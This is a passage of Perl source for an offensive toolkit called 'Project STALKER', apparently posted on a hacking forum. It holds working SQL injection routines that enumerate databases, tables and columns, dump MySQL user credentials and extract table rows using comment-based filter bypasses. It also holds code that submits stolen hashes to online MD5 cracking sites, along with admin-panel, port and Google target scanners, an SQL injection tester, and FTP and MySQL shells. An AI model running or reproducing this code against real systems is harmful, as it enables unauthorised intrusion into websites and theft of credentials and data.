if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
my $resto = $1;
$total = $resto - 17; 
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}	 
}
 
sub reload {
&menu_options($_[0]);
}
 
 
sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[Column $real] : $1\n"; 
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}}
 
sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
print "\n";
} else {
print "[-] information_schema = ERROR\n";
}
}
 
sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
print "\n";	
} else {
print "\n[-] information_schema = ERROR\n";
}}
 
sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}
}
} else {
print "\n[-] information_schema = ERROR\n";
}
print "\n";
}
 
sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) { 
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
print "\n";
&reload;
}
}
}
} else {
print "\n[-] mysql.user = ERROR\n\n";
}
}
 
sub dump {
savefile($_[5].".txt","\n");
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){ 
my $start = $1;
my $end = $2;
print "\n\n[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1; 
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) { 
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n"; 
} else {
print "\n\n[+] Extracting Finish\n\n"; 
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}
 
sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}
 
sub ascii {
return join ',',unpack "U*",$_[0]; 
}
 
sub base {
$re = encode_base64($_[0]);
chomp $re;
return $re;
}
 
sub base_de {
$re = decode_base64($_[0]);
chomp $re;
return $re;
}
 
 
sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}
 
 
sub hex_en {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}
return $hex;
}
 
sub hex_de {
my $text = shift;
$text =~ s/^0x//;
$encode = join q[], map { chr hex } $text =~ /../g;
return $encode;
}
 
sub ascii_de {
my $text = shift;
$text = join q[], map { chr } split q[,],$text;
return $text;
}
 
sub getprocess {
 
my %procesos;
 
my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
my $dos = $uno->ConnectServer("","root\\cimv2");
 
foreach my $pro (in $dos->InstancesOf("Win32_Process")){
$procesos{$pro->{Caption}} = $pro->{ProcessId};
}
return %procesos;
}
 
sub killprocess {
 
my ($numb,$pid) = @_;
 
if (Win32::Process::KillProcess($pid,$numb)) {
return true;
} else {
return false;
}
}
 
sub getip {
my $get = gethostbyname($_[0]);
return inet_ntoa($get);
}
 
sub crackit {
 
my $secret = $_[0];
 
print "[+] Cracking $_[0]\n\n";
 
my %hash = (
 
'http://passcracking.com/' => {
'tipo'  => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},   
'http://md5.hashcracking.com/search.php?md5=' =>  { 
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' =>  { 
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' =>  { 
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' =>  { 
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' =>  { 
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
}
);
 
for my $data(keys %hash) {
 
if ($hash{$data}{tipo} eq "get") {
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
saveyes("logs/pass-found.txt",$secret.":".$1);
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
saveyes("logs/pass-found.txt",$secret.":".$1);
}
}
}
print "\n[+] Finish\n"; 
}
 
sub ftp {
 
my ($ftp,$user,$pass) = @_;
 
if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {
 
print "\n[+] Enter of the server FTP\n\n";
 
menu:
 
print "\n\nftp>";
chomp (my $cmd = <stdin>);
print "\n\n";
 
if ($cmd=~/help/) {
print q(
 
help : show information
cd : change directory <dir>
dir : list a directory 
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory  
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>
exit : ??
 
 
);
}
 
if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}
 
if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}
 
if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}
 
if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}
 
if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}
 
if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}
 
if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}
 
if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n"; 
} else {
print "\n\n[-] Error\n\n";
}
}
 
if ($cmd=~/exit/ig) {
next;
}
 
if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}
 
if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}
 
if ($cmd=~/quit/) {
next;
}
 
goto menu;
 
} else {
print "\n[-] Failed the login\n\n";
}
 
} else {
print "\n\n[-] Error\n\n";
}
 
 
 
}
 
 
sub scanpaths {
 
my $urla = $_[0];
 
print "\n[+] Find paths in $urla\n\n\n";
my @urls = repes(get_links(toma($urla)));
for $url(@urls) {
my $web = $url;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
if ($_[0] =~/$auth/ or $auth eq "") {
if ($path=~/(.*)\/(.*)\.(.*)$/) {
my $borrar = $2.".".$3;
if ($web=~/(.*)$borrar/) {
my $co = $1;
unless ($co=~/$auth/) {
$co = $urla.$co;
}
$code = toma($co);
if ($code=~/Index Of/ig) {
print "[Link] : ".$co."\n";
saveyes("logs/paths-found.txt",$co);
}}}}}
print "\n\n[+] Finish\n";
}
 
 
sub scanport {
 
my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);
 
 
print "[+] Scanning $_[0]\n\n\n";
 
for my $port(keys %ports) {
 
if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}
print "\n\n[+] Finish\n";
}
 
 
sub scanpanel {
print "[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
saveyes("logs/panel-logs.txt",$_[0]."/".$path);
}
}
print "\n\n[+] Finish\n";
}
 
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}
 
for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}
 
my @founds = repes(@founds);
 
return @founds; 
}
 
 
sub sql {
 
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
saveyes("logs/sql-logs.txt",$page);
}}
 
sub get_links {
 
my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;
 
sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
 
}
 
sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}
 
sub head {
cprint "\x0311"; #13
print "\n\n-- == Project STALKER == --\n\n"; 
cprint "\x030";
}
 
sub copyright {
cprint "\x0311"; #13
print"\n\n(C) Doddy Hackman 2011\n\n";
cprint "\x030";
}
 
sub toma {
return $nave->get($_[0])->content;
}
 
sub tomax {
return $nave->get($_[0]);
}
 
sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}
 
 
sub conectar {
 
my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
Proto => "tcp",Timeout  => 5);
 
print $sockex $_[2]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r\n";
}
 
 
sub enter {
 
my ($host,$user,$pass) = @_;
 
print "[+] Connecting to the server\n";
 
$info = "dbi:mysql::".$host.":3306";
if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {
 
print "\n[+] Enter in the database";
 
while(1) {
print "\n\n\n[+] Query : ";
chomp(my $ac = <stdin>);
 
if ($ac eq "exit") {
$enter->disconnect;
print "\n\n[+] Closing connection\n\n";
last;
}
 
$re = $enter->prepare($ac);
$re->execute();
my $total = $re->rows();
 
my @columnas = @{$re->{NAME}};
 
if ($total eq "-1") {
print "\n\n[-] Query Error\n";
next;
} else {
print "\n\n[+] Result of the query\n";
if ($total eq 0) {
print "\n\n[+] Not rows returned\n\n";
} else {
print "\n\n[+] Rows returned : ".$total."\n\n\n";
for(@columnas) {
print $_."\t\t";
}
print "\n\n";
while (@row = $re->fetchrow_array) {
for(@row) {
print $_."\t\t";
}
print "\n";
}}}}
} else {
print "\n[-] Error connecting\n";
}}
 
sub saveyes {
open (SAVE,">>".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}
 
sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}
 
sub coleccionar {
opendir DIR,$_[0];
my @archivos = readdir DIR;
close DIR;
return @archivos;
}
 
sub helpme {
 
cprint "\x0310"; #13
print qq(
 
Commands : 
 
 
getinfo 
getip <host>
getlink <page>
getprocess 
killprocess <name process> <pid process>
conec <host> <port> <command>  
allow <host>
paths <page>
encodehex <text>
decodehex <text>
encodeascii <text>
decodeascii <text>
encodebase <text>
decodebase <text>
scanport <host>
panel <page>
getpass <hash>
kobra <page>
ftp <host> <user> <pass>
mysql <host> <user> <pass>
navegator
scangoogle
help
exit
 
);
cprint "\x030";
}
 
#
#  The End ?
#

Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42 43